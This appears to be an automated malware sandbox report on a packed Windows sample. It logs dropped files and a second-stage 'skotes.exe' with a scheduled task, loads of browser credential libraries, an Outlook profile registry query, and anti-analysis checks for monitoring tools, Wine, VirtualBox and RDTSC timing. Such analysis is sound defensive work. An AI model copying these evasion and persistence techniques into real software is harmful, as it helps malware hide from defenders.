                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                      Source: file.exeStatic file information: File size 1854976 > 1048576
                      Source: file.exeStatic PE information: Raw size of oxalzsyt is bigger than: 0x100000 < 0x1aae00
                      Source: Binary string: mozglue.pdbP source: file.exe, 00000002.00000002.1868728023.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr
                      Source: Binary string: nss3.pdb@ source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.2.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                      Source: Binary string: nss3.pdb source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.2.dr
                      Source: Binary string: mozglue.pdb source: file.exe, 00000002.00000002.1868728023.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 2.2.file.exe.cd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oxalzsyt:EW;hbjffglw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oxalzsyt:EW;hbjffglw:EW;.taggant:EW;
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeUnpacked PE file: 26.2.DocumentsGDHDHJEBGH.exe.860000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 27.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 30.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW;
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 31.2.skotes.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aqmlcjde:EW;yinsocgv:EW;.taggant:EW;
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: real checksum: 0x1e1ff7 should be: 0x1df914
                      Source: file.exeStatic PE information: real checksum: 0x1c7adc should be: 0x1d2bac
                      Source: random[1].exe.2.drStatic PE information: real checksum: 0x1e1ff7 should be: 0x1df914
                      Source: skotes.exe.26.drStatic PE information: real checksum: 0x1e1ff7 should be: 0x1df914
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: .idata
                      Source: file.exeStatic PE information: section name:
                      Source: file.exeStatic PE information: section name: oxalzsyt
                      Source: file.exeStatic PE information: section name: hbjffglw
                      Source: file.exeStatic PE information: section name: .taggant
                      Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                      Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                      Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: random[1].exe.2.drStatic PE information: section name:
                      Source: random[1].exe.2.drStatic PE information: section name: .idata
                      Source: random[1].exe.2.drStatic PE information: section name:
                      Source: random[1].exe.2.drStatic PE information: section name: aqmlcjde
                      Source: random[1].exe.2.drStatic PE information: section name: yinsocgv
                      Source: random[1].exe.2.drStatic PE information: section name: .taggant
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name:
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: .idata
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name:
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: aqmlcjde
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: yinsocgv
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: .taggant
                      Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                      Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                      Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
                      Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                      Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
                      Source: skotes.exe.26.drStatic PE information: section name:
                      Source: skotes.exe.26.drStatic PE information: section name: .idata
                      Source: skotes.exe.26.drStatic PE information: section name:
                      Source: skotes.exe.26.drStatic PE information: section name: aqmlcjde
                      Source: skotes.exe.26.drStatic PE information: section name: yinsocgv
                      Source: skotes.exe.26.drStatic PE information: section name: .taggant
                      Source: knotc[1].exe.31.drStatic PE information: section name: _RDATA
                      Source: knotc.exe.31.drStatic PE information: section name: _RDATA
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_0040D91C push ecx; ret 31_2_0040D92F
                      Source: file.exeStatic PE information: section name: oxalzsyt entropy: 7.952998390623427
                      Source: random[1].exe.2.drStatic PE information: section name: entropy: 7.982066283158253
                      Source: random[1].exe.2.drStatic PE information: section name: aqmlcjde entropy: 7.953470418899832
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: entropy: 7.982066283158253
                      Source: DocumentsGDHDHJEBGH.exe.2.drStatic PE information: section name: aqmlcjde entropy: 7.953470418899832
                      Source: skotes.exe.26.drStatic PE information: section name: entropy: 7.982066283158253
                      Source: skotes.exe.26.drStatic PE information: section name: aqmlcjde entropy: 7.953470418899832

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsGDHDHJEBGH.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsGDHDHJEBGH.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\random[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1009551001\knotc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\knotc[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsGDHDHJEBGH.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\DocumentsGDHDHJEBGH.exeJump to dropped file
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeFile created: C:\Windows\Tasks\skotes.job
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1093A32 second address: 1093A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A585D second address: 10A5869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5AF1 second address: 10A5B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5C4F second address: 10A5C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5C55 second address: 10A5C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F99A452D6C6h 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5C63 second address: 10A5C6F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99A4D68166h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A5E15 second address: 10A5E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A869C second address: 10A86BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2FACh], edi 0x0000000f push 00000000h 0x00000011 mov di, dx 0x00000014 push 23CF62E1h 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F99A4D68168h 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A86BF second address: 10A86C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8783 second address: 10A8789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A8789 second address: 10A87B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b add si, E9C6h 0x00000010 mov dword ptr [ebp+122D32ECh], ecx 0x00000016 call 00007F99A452D6C9h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edi 0x0000001f pop edi 0x00000020 push edi 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A87B0 second address: 10A87B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A87B6 second address: 10A880D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F99A452D6CFh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F99A452D6D8h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F99A452D6D4h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jnc 00007F99A452D6D0h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A880D second address: 10A889F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 jns 00007F99A4D68178h 0x0000000e push 00000003h 0x00000010 jmp 00007F99A4D68171h 0x00000015 push 00000000h 0x00000017 mov ecx, 1240DDD4h 0x0000001c push 00000003h 0x0000001e jmp 00007F99A4D6816Ah 0x00000023 push FDDDE4F1h 0x00000028 push ecx 0x00000029 jng 00007F99A4D68175h 0x0000002f pop ecx 0x00000030 xor dword ptr [esp], 3DDDE4F1h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F99A4D68168h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 lea ebx, dword ptr [ebp+1245C59Ch] 0x00000057 mov esi, edi 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A889F second address: 10A88B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F99A452D6CBh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A88EC second address: 10A88F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A88F2 second address: 10A896A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 movsx edx, bx 0x0000000b push 00000000h 0x0000000d push CC89A32Bh 0x00000012 jnp 00007F99A452D6DDh 0x00000018 jmp 00007F99A452D6D7h 0x0000001d add dword ptr [esp], 33765D55h 0x00000024 or dword ptr [ebp+122D337Ch], ecx 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e jmp 00007F99A452D6D3h 0x00000033 push 00000003h 0x00000035 add dword ptr [ebp+122D2595h], edi 0x0000003b push 8CE3D007h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jmp 00007F99A452D6D3h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A896A second address: 10A896F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A582 second address: 109A586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A586 second address: 109A5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F99A4D68166h 0x0000000f jmp 00007F99A4D68172h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7E7E second address: 10C7E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F99A452D6D1h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7E97 second address: 10C7E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7E9B second address: 10C7EAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F99A452D6CEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7EAF second address: 10C7EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F99A4D6816Ch 0x0000000c pop ecx 0x0000000d rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109A572 second address: 109A582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
